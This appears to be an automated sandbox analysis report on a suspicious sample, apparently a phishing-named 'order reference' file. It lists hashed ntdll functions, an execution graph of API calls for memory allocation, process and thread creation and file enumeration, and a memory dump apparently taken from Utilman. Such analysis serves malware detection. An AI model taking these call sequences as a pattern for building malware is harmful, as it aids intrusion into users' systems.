                                                                                            Function 01937630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01974742
                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01974725
                                                                                            • Execute=1, xrefs: 01974713
                                                                                            • ExecuteOptions, xrefs: 019746A0
                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01974787
                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01974655
                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019746FC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                            • API String ID: 0-484625025
                                                                                            • Opcode ID: b064bf9ace0beb66754624c1e93756ecd5aeff065fca907c10736328af944361
                                                                                            • Instruction ID: a7a76a1a21fbacdedb3476d4d9d57d2fd5e9117b8b19c8bcafa9266c7fafd178
                                                                                            • Opcode Fuzzy Hash: b064bf9ace0beb66754624c1e93756ecd5aeff065fca907c10736328af944361
                                                                                            • Instruction Fuzzy Hash: D05148B160020A7BEF25ABE8DC99FA977ACEF94304F0404ADD60DA7181E7719E41CF51
                                                                                            Function 019D6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                            • Instruction ID: 585d9d3cba44b55fe2ea599f47196abd6173923c3c4e7f6f6b4e312c68ca14c6
                                                                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                            • Instruction Fuzzy Hash: 48020671508342AFD309CF68C890E6BBBE5EFC8704F44892DFA894B264DB31E945CB52
                                                                                            Function 0194B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction ID: 37fbafaa788e5c74d8bec91fba89c4c8d35ba7724ea30e2ed54883f57aafd99f
                                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                            • Instruction Fuzzy Hash: EE81BF70E052499FEF29CF6CC891FFEBBAAAF45321F184619D85AA7691C634C8408B51
                                                                                            Function 019B20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$[$]:%u
                                                                                            • API String ID: 48624451-2819853543
                                                                                            • Opcode ID: b03fdd17cdb47544054353589cd4056fe33cd3f67a2a2ba4fea771c41250db4f
                                                                                            • Instruction ID: cc570b671901f6e2576de6cfd202457c2a1141a0ad32bb6c95d4732d59fc6464
                                                                                            • Opcode Fuzzy Hash: b03fdd17cdb47544054353589cd4056fe33cd3f67a2a2ba4fea771c41250db4f
                                                                                            • Instruction Fuzzy Hash: 8721367AE00119ABDB11DF79D984AEE7BECFF54655F440119EE19E3200E730A9028B91
                                                                                            Function 0192F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019702BD
                                                                                            • RTL: Re-Waiting, xrefs: 0197031E
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019702E7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                            • API String ID: 0-2474120054
                                                                                            • Opcode ID: 121007ba77a96a57a78ee1355a7ba7a2ff99cfa88cde5b58d851584931af746e
                                                                                            • Instruction ID: d0ded7e313bf55e38ebb3f99d142cb4dbaf2a82d7eb92724c26e667fd619f20b
                                                                                            • Opcode Fuzzy Hash: 121007ba77a96a57a78ee1355a7ba7a2ff99cfa88cde5b58d851584931af746e
                                                                                            • Instruction Fuzzy Hash: B2E18B316087529FD725CF28C884B2ABBF4BF85724F180A6DF5A98B2E1D774D944CB42
                                                                                            Function 0193BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RTL: Resource at %p, xrefs: 01977B8E
                                                                                            • RTL: Re-Waiting, xrefs: 01977BAC
                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01977B7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 0-871070163
                                                                                            • Opcode ID: 1e57129213f583279cd31eada5dadf4750eb68e10c7797be6ca3ce03a14a5d15
                                                                                            • Instruction ID: 975fac604d88caf936de7e206e015c0c43051ec16227ddef2b89f35e01746ec1
                                                                                            • Opcode Fuzzy Hash: 1e57129213f583279cd31eada5dadf4750eb68e10c7797be6ca3ce03a14a5d15
                                                                                            • Instruction Fuzzy Hash: 7541C1313007029FD724EE29C840F6AB7E9EFD9721F100A1DEA5EDB680DB31E9058B91
                                                                                            Function 0193B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197728C
                                                                                            Strings
                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01977294
                                                                                            • RTL: Resource at %p, xrefs: 019772A3
                                                                                            • RTL: Re-Waiting, xrefs: 019772C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                            • API String ID: 885266447-605551621
                                                                                            • Opcode ID: c4e8858824973f5583e2b91cf1f38303fdd5629afa8b678b107088d9372f4dc0
                                                                                            • Instruction ID: 93d9eaf0b775e44cc0b89e7a3dd785837098b8883832a39091f8d32e8645afa4
                                                                                            • Opcode Fuzzy Hash: c4e8858824973f5583e2b91cf1f38303fdd5629afa8b678b107088d9372f4dc0
                                                                                            • Instruction Fuzzy Hash: F6410231700206ABD724DE69CC45F6AB7A5FF95B21F100A19F96EEB280DB21E812C7D1
                                                                                            Function 019B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: ___swprintf_l
                                                                                            • String ID: %%%u$]:%u
                                                                                            • API String ID: 48624451-3050659472
                                                                                            • Opcode ID: 9b02d800b1511fe0a3af234af25fc0f418314d3ac14a2b07810cf058d42427dd
                                                                                            • Instruction ID: dc3e82e5e0d1c5d895040124aba8a360587e1ed1e1d082fd7f118678f5d88f00
                                                                                            • Opcode Fuzzy Hash: 9b02d800b1511fe0a3af234af25fc0f418314d3ac14a2b07810cf058d42427dd
                                                                                            • Instruction Fuzzy Hash: A5316676A012199FDB60DF2DCD80BEE77FCEB54611F444559E94DE3240EB30AA458BA0
                                                                                            Function 01947D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction ID: 908bf257302396b3218af323367e089a7dab914124c348ee519f6e6f8b7ec30f
                                                                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                            • Instruction Fuzzy Hash: E791C571E0020E9BDB38DFEDC880EBEBBA9EF44321F54465AE95DA72D0D73099408711
                                                                                            Function 01909126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $$@
                                                                                            • API String ID: 0-1194432280
                                                                                            • Opcode ID: 326cbc29bf33c91e2d6c901017a36c17e770e982106ae82f5592467f72ec1106
                                                                                            • Instruction ID: db3e46eaa13f994af1efb39de2915da75427ef74825184b57f5600adb04a0cf8
                                                                                            • Opcode Fuzzy Hash: 326cbc29bf33c91e2d6c901017a36c17e770e982106ae82f5592467f72ec1106
                                                                                            • Instruction Fuzzy Hash: C281F971D012699FDB35DB54CC44BEAB6B8AB48754F0045EAAA1DB7280D7709E84CFA0
                                                                                            Function 0198CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0198CFBD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallFilterFunc@8
                                                                                            • String ID: @$@4Cw@4Cw
                                                                                            • API String ID: 4062629308-3101775584
                                                                                            • Opcode ID: 4d45bf4a118f2500e51a3018b02e54d1970b79cd2e857afa5cc706e3dbb3d9a8
                                                                                            • Instruction ID: df8068337b8f8bbc60faf3eb07ec49625be59b0adea79d5d790e558b220ae8c9
                                                                                            • Opcode Fuzzy Hash: 4d45bf4a118f2500e51a3018b02e54d1970b79cd2e857afa5cc706e3dbb3d9a8
                                                                                            • Instruction Fuzzy Hash: CB418271900219EFDB21EF99C840AADBBF8FF95B50F10442EEA19EB294D734D941CB61

                                                                                            Execution Graph

                                                                                            Execution Coverage:2.4%
                                                                                            Dynamic/Decrypted Code Coverage:4.4%
                                                                                            Signature Coverage:1.6%
                                                                                            Total number of Nodes:428
                                                                                            Total number of Limit Nodes:71
                                                                                            execution_graph 100702 3209f20 100704 3209f2f 100702->100704 100703 3209f70 100704->100703 100705 3209f5d CreateThread 100704->100705 100956 320b6e0 100957 322b720 NtAllocateVirtualMemory 100956->100957 100958 320cd51 100957->100958 100959 3217560 100960 3217578 100959->100960 100962 32175d2 100959->100962 100960->100962 100963 321b4a0 100960->100963 100964 321b4c6 100963->100964 100965 321b6ff 100964->100965 100990 3229ae0 100964->100990 100965->100962 100967 321b542 100967->100965 100968 322c970 2 API calls 100967->100968 100969 321b561 100968->100969 100969->100965 100970 321b638 100969->100970 100971 3228d10 LdrInitializeThunk 100969->100971 100972 3215d90 LdrInitializeThunk 100970->100972 100974 321b657 100970->100974 100973 321b5c3 100971->100973 100972->100974 100973->100970 100975 321b5cc 100973->100975 100989 321b6e7 100974->100989 100996 3228880 100974->100996 100975->100965 100982 321b5fe 100975->100982 100983 321b620 100975->100983 100993 3215d90 100975->100993 100976 3218310 LdrInitializeThunk 100980 321b62e 100976->100980 100980->100962 100981 3218310 LdrInitializeThunk 100985 321b6f5 100981->100985 101011 32249a0 LdrInitializeThunk 100982->101011 100983->100976 100984 321b6be 101001 3228930 100984->101001 100985->100962 100987 321b6d8 101006 3228a90 100987->101006 100989->100981 100991 3229afa 100990->100991 100992 3229b0b CreateProcessInternalW 100991->100992 100992->100967 100995 3215dce 100993->100995 101012 3228ee0 100993->101012 100995->100982 100997 32288fd 100996->100997 100998 32288ab 100996->100998 101018 51239b0 LdrInitializeThunk 100997->101018 100998->100984 100999 3228922 100999->100984 101002 32289aa 101001->101002 101004 3228958 101001->101004 101019 5124340 LdrInitializeThunk 101002->101019 101003 32289cf 101003->100987 101004->100987 101007 3228b0a 101006->101007 101009 3228ab8 101006->101009 101020 5122fb0 LdrInitializeThunk 101007->101020 101008 3228b2f 101008->100989 101009->100989 101011->100983 101013 3228f8e 101012->101013 101014 3228f0c 101012->101014 101017 5122d10 LdrInitializeThunk 101013->101017 101014->100995 101015 3228fd3 101015->100995 101017->101015 101018->100999 101019->101003 101020->101008 101021 3216fe0 101022 321700a 101021->101022 101025 3218140 101022->101025 101024 3217031 101026 321815d 101025->101026 101032 3228e00 101026->101032 101028 32181b4 101028->101024 101029 32181ad 101029->101028 101030 3228ee0 LdrInitializeThunk 101029->101030 101031 32181dd 101030->101031 101031->101024 101033 3228e2b 101032->101033 101034 3228e9b 101032->101034 101033->101029 101037 5122f30 LdrInitializeThunk 101034->101037 101035 3228ed4 101035->101029 101037->101035 100706 322c8a0 100709 322b7a0 100706->100709 100712 3229a50 100709->100712 100711 322b7b9 100713 3229a6d 100712->100713 100714 3229a7e RtlFreeHeap 100713->100714 100714->100711 101043 32293e0 101044 3229497 101043->101044 101046 322940f 101043->101046 101045 32294ad NtCreateFile 101044->101045 101047 5122ad0 LdrInitializeThunk 100715 32185a2 GetFileAttributesW 100716 32185b3 100715->100716 100717 32129b0 100718 32129c8 100717->100718 100721 3216510 100718->100721 100720 32129d3 100723 3216543 100721->100723 100722 3216564 100722->100720 100723->100722 100728 3229240 100723->100728 100725 3216587 100725->100722 100732 32296e0 100725->100732 100727 3216607 100727->100720 100729 322925a 100728->100729 100735 5122ca0 LdrInitializeThunk 100729->100735 100730 3229286 100730->100725 100733 32296fd 100732->100733 100734 322970e NtClose 100733->100734 100734->100727 100735->100730 100736 321c830 100738 321c859 100736->100738 100737 321c95d 100738->100737 100739 321c903 FindFirstFileW 100738->100739 100739->100737 100741 321c91e 100739->100741 100740 321c944 FindNextFileW 100740->100741 100742 321c956 FindClose 100740->100742 100741->100740 100742->100737 101048 321af70 101053 321ac80 101048->101053 101050 321af7d 101065 321a8f0 101050->101065 101052 321af99 101054 321aca5 101053->101054 101055 321adf3 101054->101055 101075 3223550 101054->101075 101055->101050 101057 321ae01 101058 321ae0a 101057->101058 101060 321aef7 101057->101060 101090 321a340 101057->101090 101058->101050 101061 321af5a 101060->101061 101099 321a6b0 101060->101099 101063 322b7a0 RtlFreeHeap 101061->101063 101064 321af61 101063->101064 101064->101050 101066 321a906 101065->101066 101072 321a911 101065->101072 101067 322b880 RtlAllocateHeap 101066->101067 101067->101072 101068 321a938 101068->101052 101069 321ac52 101070 321ac6b 101069->101070 101071 322b7a0 RtlFreeHeap 101069->101071 101070->101052 101071->101070 101072->101068 101072->101069 101073 321a340 RtlFreeHeap 101072->101073 101074 321a6b0 RtlFreeHeap 101072->101074 101073->101072 101074->101072 101076 322355e 101075->101076 101077 3223565 101075->101077 101076->101057 101078 32147b0 LdrLoadDll 101077->101078 101079 322359a 101078->101079 101080 32235a9 101079->101080 101103 3223010 LdrLoadDll 101079->101103 101082 322b880 RtlAllocateHeap 101080->101082 101086 3223757 101080->101086 101083 32235c2 101082->101083 101084 322374d 101083->101084 101083->101086 101087 32235de 101083->101087 101085 322b7a0 RtlFreeHeap 101084->101085 101084->101086 101085->101086 101086->101057 101087->101086 101088 322b7a0 RtlFreeHeap 101087->101088 101089 3223741 101088->101089 101089->101057 101091 321a366 101090->101091 101104 321dda0 101091->101104 101093 321a3db 101095 321a560 101093->101095 101096 321a3f9 101093->101096 101094 321a545 101094->101057 101095->101094 101097 321a200 RtlFreeHeap 101095->101097 101096->101094 101109 321a200 101096->101109 101097->101095 101100 321a6d6 101099->101100 101101 321dda0 RtlFreeHeap 101100->101101 101102 321a75d 101101->101102 101102->101060 101103->101080 101106 321ddc4 101104->101106 101105 321ddd1 101105->101093 101106->101105 101107 322b7a0 RtlFreeHeap 101106->101107 101108 321de14 101107->101108 101108->101093 101110 321a21d 101109->101110 101113 321de30 101110->101113 101112 321a323 101112->101096 101114 321de54 101113->101114 101115 321defe 101114->101115 101116 322b7a0 RtlFreeHeap 101114->101116 101115->101112 101116->101115 100743 3220330 100744 322034d 100743->100744 100747 32147b0 100744->100747 100746 322036b 100748 32147b1 100747->100748 100749 3214810 LdrLoadDll 100748->100749 100750 32147db 100748->100750 100749->100750 100750->100746 101117 3221970 101118 322198c 101117->101118 101119 32219b4 101118->101119 101120 32219c8 101118->101120 101122 32296e0 NtClose 101119->101122 101121 32296e0 NtClose 101120->101121 101123 32219d1 101121->101123 101124 32219bd 101122->101124 101127 322b8c0 RtlAllocateHeap 101123->101127 101126 32219dc 101127->101126 100751 3218a37 100752 3218a3a 100751->100752 100754 32189f1 100752->100754 100755 3217300 100752->100755 100756 3217316 100755->100756 100758 321734f 100755->100758 100756->100758 100759 3217170 LdrLoadDll 100756->100759 100758->100754 100759->100758 100760 321103b PostThreadMessageW 100761 321104d 100760->100761 100762 3209f80 100764 320a0a6 100762->100764 100765 320a607 100764->100765 100766 322b410 100764->100766 100767 322b436 100766->100767 100772 3204140 100767->100772 100769 322b442 100770 322b47b 100769->100770 100775 3225810 100769->100775 100770->100765 100774 320414d 100772->100774 100779 3213460 100772->100779 100774->100769 100776 3225872 100775->100776 100778 322587f 100776->100778 100797 3211c10 100776->100797 100778->100770 100780 3213475 100779->100780 100782 3213493 100780->100782 100783 322a150 100780->100783 100782->100774 100785 322a16a 100783->100785 100784 322a199 100784->100782 100785->100784 100790 3228d10 100785->100790 100788 322b7a0 RtlFreeHeap 100789 322a209 100788->100789 100789->100782 100791 3228d2a 100790->100791 100794 5122c0a 100791->100794 100792 3228d56 100792->100788 100795 5122c11 100794->100795 100796 5122c1f LdrInitializeThunk 100794->100796 100795->100792 100796->100792 100798 3211c48 100797->100798 100813 32180a0 100798->100813 100800 3211c50 100801 3211f2d 100800->100801 100824 322b880 100800->100824 100801->100778 100803 3211c66 100804 322b880 RtlAllocateHeap 100803->100804 100805 3211c77 100804->100805 100806 322b880 RtlAllocateHeap 100805->100806 100808 3211c88 100806->100808 100812 3211d25 100808->100812 100831 3216c70 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100808->100831 100809 32147b0 LdrLoadDll 100810 3211ee2 100809->100810 100827 3228150 100810->100827 100812->100809 100814 32180cc 100813->100814 100832 3217f90 100814->100832 100817 3218111 100819 321812d 100817->100819 100822 32296e0 NtClose 100817->100822 100818 32180f9 100820 3218104 100818->100820 100821 32296e0 NtClose 100818->100821 100819->100800 100820->100800 100821->100820 100823 3218123 100822->100823 100823->100800 100843 3229a00 100824->100843 100826 322b89b 100826->100803 100828 32281b1 100827->100828 100830 32281be 100828->100830 100846 3211f40 100828->100846 100830->100801 100831->100812 100833 3218086 100832->100833 100834 3217faa 100832->100834 100833->100817 100833->100818 100838 3228db0 100834->100838 100837 32296e0 NtClose 100837->100833 100839 3228dca 100838->100839 100842 51235c0 LdrInitializeThunk 100839->100842 100840 321807a 100840->100837 100842->100840 100844 3229a1d 100843->100844 100845 3229a2e RtlAllocateHeap 100844->100845 100845->100826 100848 3211f60 100846->100848 100862 3218370 100846->100862 100857 32124b6 100848->100857 100866 3221340 100848->100866 100851 3212177 100874 322c970 100851->100874 100852 3211fbe 100852->100857 100869 322c840 100852->100869 100854 321218c 100855 32121d9 100854->100855 100880 3210a60 100854->100880 100855->100857 100859 3210a60 LdrInitializeThunk 100855->100859 100884 3218310 100855->100884 100857->100830 100859->100855 100860 321232a 100860->100855 100861 3218310 LdrInitializeThunk 100860->100861 100861->100860 100863 321837d 100862->100863 100864 32183a5 100863->100864 100865 321839e SetErrorMode 100863->100865 100864->100848 100865->100864 100888 322b720 100866->100888 100868 3221361 100868->100852 100870 322c850 100869->100870 100871 322c856 100869->100871 100870->100851 100872 322b880 RtlAllocateHeap 100871->100872 100873 322c87c 100872->100873 100873->100851 100875 322c8e0 100874->100875 100876 322c93d 100875->100876 100877 322b880 RtlAllocateHeap 100875->100877 100876->100854 100878 322c91a 100877->100878 100879 322b7a0 RtlFreeHeap 100878->100879 100879->100876 100881 3210a6e 100880->100881 100895 3229960 100881->100895 100885 3218323 100884->100885 100900 3228c10 100885->100900 100887 321834e 100887->100855 100891 3229840 100888->100891 100890 322b74e 100890->100868 100892 32298d5 100891->100892 100894 322986b 100891->100894 100893 32298eb NtAllocateVirtualMemory 100892->100893 100893->100890 100894->100890 100896 322997d 100895->100896 100899 5122c70 LdrInitializeThunk 100896->100899 100897 3210a7f 100897->100860 100899->100897 100901 3228c8b 100900->100901 100902 3228c38 100900->100902 100905 5122dd0 LdrInitializeThunk 100901->100905 100902->100887 100903 3228cb0 100903->100887 100905->100903 100906 3217380 100907 321739c 100906->100907 100915 32173f5 100906->100915 100909 32296e0 NtClose 100907->100909 100907->100915 100908 3217521 100912 32173bd 100909->100912 100911 32174fe 100911->100908 100918 3216970 NtClose LdrInitializeThunk LdrInitializeThunk 100911->100918 100916 32167a0 NtClose LdrInitializeThunk LdrInitializeThunk 100912->100916 100915->100908 100917 32167a0 NtClose LdrInitializeThunk LdrInitializeThunk 100915->100917 100916->100915 100917->100911 100918->100908 100919 3221d00 100921 3221d19 100919->100921 100920 3221d61 100922 322b7a0 RtlFreeHeap 100920->100922 100921->100920 100924 3221da1 100921->100924 100926 3221da6 100921->100926 100923 3221d71 100922->100923 100925 322b7a0 RtlFreeHeap 100924->100925 100925->100926 100927 3226280 100928 32262da 100927->100928 100930 32262e7 100928->100930 100931 3223c90 100928->100931 100932 322b720 NtAllocateVirtualMemory 100931->100932 100933 3223cd1 100932->100933 100934 32147b0 LdrLoadDll 100933->100934 100936 3223dde 100933->100936 100937 3223d17 100934->100937 100935 3223d60 Sleep 100935->100937 100936->100930 100937->100935 100937->100936 101133 3228b40 101134 3228bcf 101133->101134 101136 3228b6b 101133->101136 101138 5122ee0 LdrInitializeThunk 101134->101138 101135 3228c00 101138->101135 101140 3229640 101141 32296b7 101140->101141 101143 322966b 101140->101143 101142 32296cd NtDeleteFile 101141->101142 101144 3228cc0 101145 3228cda 101144->101145 101148 5122df0 LdrInitializeThunk 101145->101148 101146 3228d02 101148->101146 101149 3219e4c 101151 3219e51 101149->101151 101150 3219e7d 101151->101150 101152 322b7a0 RtlFreeHeap 101151->101152 101152->101150 100938 3215e10 100939 3218310 LdrInitializeThunk 100938->100939 100940 3215e40 100939->100940 100942 3215e6c 100940->100942 100943 3218290 100940->100943 100944 32182d4 100943->100944 100945 32182f5 100944->100945 100950 32289e0 100944->100950 100945->100940 100947 32182e5 100948 3218301 100947->100948 100949 32296e0 NtClose 100947->100949 100948->100940 100949->100945 100951 3228a5a 100950->100951 100952 3228a08 100950->100952 100955 5124650 LdrInitializeThunk 100951->100955 100952->100947 100953 3228a7f 100953->100947 100955->100953 101153 321fa50 101154 321fab4 101153->101154 101155 3216510 2 API calls 101154->101155 101157 321fbe7 101155->101157 101156 321fbee 101157->101156 101182 3216620 101157->101182 101159 321fc6a 101160 321fda2 101159->101160 101179 321fd93 101159->101179 101186 321f830 101159->101186 101161 32296e0 NtClose 101160->101161 101163 321fdac 101161->101163 101164 321fca6 101164->101160 101165 321fcb1 101164->101165 101166 322b880 RtlAllocateHeap 101165->101166 101167 321fcda 101166->101167 101168 321fce3 101167->101168 101169 321fcf9 101167->101169 101170 32296e0 NtClose 101168->101170 101195 321f720 CoInitialize 101169->101195 101173 321fced 101170->101173 101172 321fd07 101198 3229190 101172->101198 101175 321fd82 101176 32296e0 NtClose 101175->101176 101177 321fd8c 101176->101177 101178 322b7a0 RtlFreeHeap 101177->101178 101178->101179 101180 321fd25 101180->101175 101181 3229190 LdrInitializeThunk 101180->101181 101181->101180 101183 3216645 101182->101183 101202 3229020 101183->101202 101187 321f84c 101186->101187 101188 32147b0 LdrLoadDll 101187->101188 101190 321f86a 101188->101190 101189 321f873 101189->101164 101190->101189 101191 32147b0 LdrLoadDll 101190->101191 101192 321f93e 101191->101192 101193 32147b0 LdrLoadDll 101192->101193 101194 321f99b 101192->101194 101193->101194 101194->101164 101197 321f785 101195->101197 101196 321f81b CoUninitialize 101196->101172 101197->101196 101199 32291ad 101198->101199 101207 5122ba0 LdrInitializeThunk 101199->101207 101200 32291dd 101200->101180 101203 322903a 101202->101203 101206 5122c60 LdrInitializeThunk 101203->101206 101204 32166b9 101204->101159 101206->101204 101207->101200 101208 32124d0 101209 3212506 101208->101209 101210 3228d10 LdrInitializeThunk 101208->101210 101213 3229770 101209->101213 101210->101209 101212 321251b 101214 32297fc 101213->101214 101215 3229798 101213->101215 101218 5122e80 LdrInitializeThunk 101214->101218 101215->101212 101216 322982d 101216->101212 101218->101216 101219 3213353 101220 3217f90 2 API calls 101219->101220 101221 3213363 101220->101221 101222 32296e0 NtClose 101221->101222 101223 321337f 101221->101223 101222->101223 101224 3229550 101225 32295f7 101224->101225 101227 322957b 101224->101227 101226 322960d NtReadFile 101225->101226

                                                                                            Executed Functions

                                                                                            Function 0321C830 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 0321C914
                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0321C94F
                                                                                            • FindClose.KERNELBASE(?), ref: 0321C95A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.4551544163.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Offset: 03200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_3200000_Utilman.jbxd
                                                                                            Yara matches
                                                                                            Similarity
